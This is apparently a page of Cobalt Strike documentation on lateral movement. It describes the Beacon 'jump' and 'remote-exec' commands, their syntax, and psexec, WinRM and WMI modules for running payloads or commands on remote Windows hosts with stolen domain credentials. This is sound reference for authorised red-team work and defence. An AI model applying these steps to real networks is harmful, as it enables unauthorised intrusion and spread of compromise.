Lateral Movement
Once you have a token for a domain admin or a domain user who is a local admin on a target, you may abuse this trust relationship to get control of the target. Cobalt Strike’s Beacon has several built-in options for lateral movement.
Type jump to list lateral movement options registered with Cobalt Strike. Run jump [module] [target] [listener] to attempt to run a payload on a remote target.
| Jump Module | Arch | Description |
|---|---|---|
| psexec | x86 | Use a service to run a Service EXE artifact |
| psexec64 | x64 | Use a service to run a Service EXE artifact |
| psexec_psh | x86 | Use a service to run a PowerShell one-liner |
| winrm | x86 | Run a PowerShell script via WinRM |
| winrm64 | x64 | Run a PowerShell script via WinRM |
Run remote-exec, by itself, to list remote execution modules registered with Cobalt Strike. Use remote-exec [module] [target] [command + args] to attempt to run the specified command on a remote target.
| Remote-exec Module | Description |
|---|---|
| psexec | Remote execute via Service Control Manager |
| winrm | Remote execute via WinRM (PowerShell) |
| wmi | Remote execute via WMI |
Lateral movement is an area, similar to privilege escalation, where some attacks present a natural set of primitives to spawn a session on a remote target. Some attacks give an execute-primitive only. The split between jump and remote-exec gives you flexibility to decide how to weaponize an execute-only primitive.
Aggressor Script has an API to add new modules to jump and remote-exec. See the Aggressor Script documentation (the Beacon chapter, specifically) for more information.